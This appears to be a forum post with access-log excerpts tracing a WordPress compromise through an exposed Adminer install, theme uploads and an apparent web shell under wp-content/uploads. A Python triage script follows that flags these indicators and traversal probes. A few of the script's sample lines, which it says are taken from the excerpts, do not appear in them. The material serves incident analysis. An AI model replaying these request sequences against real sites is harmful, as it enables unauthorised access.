access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:33 -0500] "GET /adminer-4.2.5.php?server=localhost&username=root&&sql= HTTP/1.1" 200 2541 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:35 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:36 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:40 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2687 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.25 - - [10/Dec/2019:17:07:40 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:43 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2745 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:43 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2970 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.25 - - [10/Dec/2019:17:07:43 -0500] "POST /wp-login.php HTTP/1.1" 200 2557 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:44 -0500] "GET /wp-admin/customize.php HTTP/1.1" 200 50365 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:47 -0500] "POST /wp-login.php HTTP/1.1" 200 2556 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:48 -0500] "GET /wp-admin/profile.php HTTP/1.1" 200 12877 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:49 -0500] "GET / HTTP/1.1" 206 6147 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:56 -0500] "GET /wp-admin/theme-install.php?browse=featured HTTP/1.1" 200 13107 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:57 -0500] "POST /wp-admin/update.php?action=upload-theme HTTP/1.1" 200 9137 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:58 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 369 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:58 -0500] "GET /wp-admin/plugin-install.php HTTP/1.1" 200 15335 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:08:03 -0500] "GET /wp-admin/customize.php HTTP/1.1" 200 50368 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:08:05 -0500] "GET /wp-admin/options-general.php HTTP/1.1" 200 18686 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:08:07 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3010 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:08:08 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3061 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:08:09 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3074 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
Code:
access.log.8.gz:162.158.91.230 - - [10/Dec/2019:17:07:29 -0500] "GET /adminer-4.2.5.php HTTP/1.1" 200 2300 "-" "Go-http-client/1.1"
access.log.8.gz:162.158.92.105 - - [10/Dec/2019:17:07:32 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 302 448 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:38 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2591 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.94.53 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3235 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.109 - - [10/Dec/2019:17:07:39 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.89.190 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.91.230 - - [10/Dec/2019:17:07:41 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2728 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:42 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:46 -0500] "GET /wp-login.php HTTP/1.1" 200 1795 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:51 -0500] "GET /wp-admin/theme-editor.php?file=header.php&theme=photographer-wp HTTP/1.1" 200 13144 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.89.172 - - [10/Dec/2019:17:07:52 -0500] "GET /wp-admin/theme-editor.php?file=header.php&theme=photographer-wp HTTP/1.1" 200 13144 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.90.171 - - [10/Dec/2019:17:07:53 -0500] "GET /wp-admin/theme-editor.php?file=footer.php&theme=photographer-wp HTTP/1.1" 200 12475 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.88.197 - - [10/Dec/2019:17:07:54 -0500] "GET /wp-admin/theme-editor.php?file=functions.php&theme=photographer-wp HTTP/1.1" 200 36617 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.90.21 - - [10/Dec/2019:17:07:55 -0500] "POST / HTTP/1.1" 206 6145 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.88.197 - - [10/Dec/2019:17:08:00 -0500] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 403 2021 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.91.124 - - [10/Dec/2019:17:08:01 -0500] "POST /wp-content/plugins/supersociall/supersociall.php HTTP/1.1" 404 4632 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.109 - - [10/Dec/2019:17:08:02 -0500] "POST /wp-admin/options.php HTTP/1.1" 403 2039 "http://CUSTOMERCOMPANY.com/wp-admin/options-general.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.88.95 - - [10/Dec/2019:17:08:03 -0500] "POST /wp-login.php HTTP/1.1" 200 2557 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.105 - - [10/Dec/2019:17:08:06 -0500] "POST /wp-admin/options.php HTTP/1.1" 302 489 "http://CUSTOMERCOMPANY.com/wp-admin/options-general.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.94.77 - - [10/Dec/2019:17:08:07 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2806 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.90.21 - - [10/Dec/2019:17:08:08 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2841 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.89.190 - - [10/Dec/2019:17:08:09 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2871 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
What does this shit mean? I traced this all the way back to an Adminer exploit. Someone left an unpatched Adminer on the system *cough cough, not me.. totally was me*. Ah well, we all fk up sometimes.
Evidence not to leave tools floating around public-facing.. dddaaaayummmiittttt h00000m0000000z stoooop hacccckking me lol
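The log review above as a repeatable check, added here as an example and not code from the original post: it parses combined-format lines, tags the indicators this writeup turned up (Adminer, PHP executing under wp-content/uploads, theme editor and upload actions, the ptz=/.. probes) and groups them into time clusters. The sample lines are taken from the excerpts above with user agents shortened; the CDN prefix list is a partial one I supplied, used only to mark requests whose real client IP was never logged.

```python
"""Triage Apache combined-format log lines for the intrusion chain traced above.

Added example, not code from the original post. Sample lines are taken from the
log excerpts on this page with user agents shortened. CDN prefixes are a partial
list (full list: https://www.cloudflare.com/ips-v4) used only to mark edge IPs.
"""
import ipaddress
import re
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Partial set of Cloudflare IPv4 prefixes covering the addresses seen on this page.
CDN_EDGE_PREFIXES = [ipaddress.ip_network(p) for p in (
    "162.158.0.0/15", "172.64.0.0/13", "141.101.64.0/18", "108.162.192.0/18")]


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def is_cdn_edge(ip):
    """True when the logged address is a CDN edge, i.e. the real client IP is missing."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CDN_EDGE_PREFIXES)


def tags_for(rec):
    """Indicators drawn from the chain seen on this page."""
    tags = []
    path, method = rec["path"], rec["method"]
    if re.search(r"/adminer[^/?]*\.php", path):
        tags.append("adminer access")                 # DB admin tool left public
    if method == "POST" and path.startswith("/wp-login.php"):
        tags.append("wp-login POST")                  # context only; noisy on its own
    if "/wp-admin/theme-editor.php" in path or "update.php?action=upload-" in path:
        tags.append("theme editor / upload")          # code written through the admin UI
    if re.match(r"/wp-content/uploads/.*\.php", path):
        tags.append("php under wp-content/uploads")   # PHP should never execute here
    if "/.." in path:
        tags.append("path traversal in query")        # the ptz=/.. probes
    return tags


def triage(lines, window=timedelta(minutes=2)):
    """Group tagged requests that fall within `window` of each other into clusters."""
    events = []
    for line in lines:
        rec = parse_line(line)
        if rec:
            rec["tags"] = tags_for(rec)
            if rec["tags"]:
                events.append(rec)
    events.sort(key=lambda r: r["ts"])
    clusters = []
    for ev in events:
        if clusters and ev["ts"] - clusters[-1]["end"] <= window:
            c = clusters[-1]
        else:
            c = {"start": ev["ts"], "end": ev["ts"], "ips": set(), "tags": [], "count": 0}
            clusters.append(c)
        c["end"] = ev["ts"]
        c["ips"].add(ev["ip"])
        c["count"] += 1
        for t in ev["tags"]:
            if t not in c["tags"]:
                c["tags"].append(t)
    for c in clusters:
        c["edge_only"] = all(is_cdn_edge(ip) for ip in c["ips"])
    return clusters


SAMPLE_LOG = """\
172.69.10.115 - - [10/Dec/2019:17:07:30 -0500] "GET /adminer-4.2.5.php HTTP/1.1" 200 2295 "-" "Mozilla/5.0"
172.69.10.115 - - [10/Dec/2019:17:07:36 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3206 "-" "Mozilla/5.0"
172.69.10.25 - - [10/Dec/2019:17:07:43 -0500] "POST /wp-login.php HTTP/1.1" 200 2557 "-" "Mozilla/5.0"
162.158.92.193 - - [10/Dec/2019:17:07:51 -0500] "GET /wp-admin/theme-editor.php?file=header.php&theme=photographer-wp HTTP/1.1" 200 13144 "-" "Mozilla/5.0"
172.69.10.73 - - [10/Dec/2019:17:07:57 -0500] "POST /wp-admin/update.php?action=upload-theme HTTP/1.1" 200 9137 "-" "Mozilla/5.0"
172.69.10.115 - - [10/Dec/2019:17:07:58 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 369 "-" "Mozilla/5.0"
141.101.77.11 - - [03/Feb/2020:16:09:18 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 277 "-" "Mozilla/5.0"
108.162.216.45 - - [03/Feb/2020:16:09:20 -0500] "GET / HTTP/1.1" 200 6630 "-" "-"
172.69.55.79 - - [03/Feb/2020:16:09:36 -0500] "GET /wp-login.php HTTP/1.1" 200 2265 "-" "Opera/9.80"
"""

if __name__ == "__main__":
    for c in triage(SAMPLE_LOG.splitlines()):
        print(c["start"], "->", c["end"], c["count"], "hits", sorted(c["ips"]),
              "edge-only" if c["edge_only"] else "", "; ".join(c["tags"]))
```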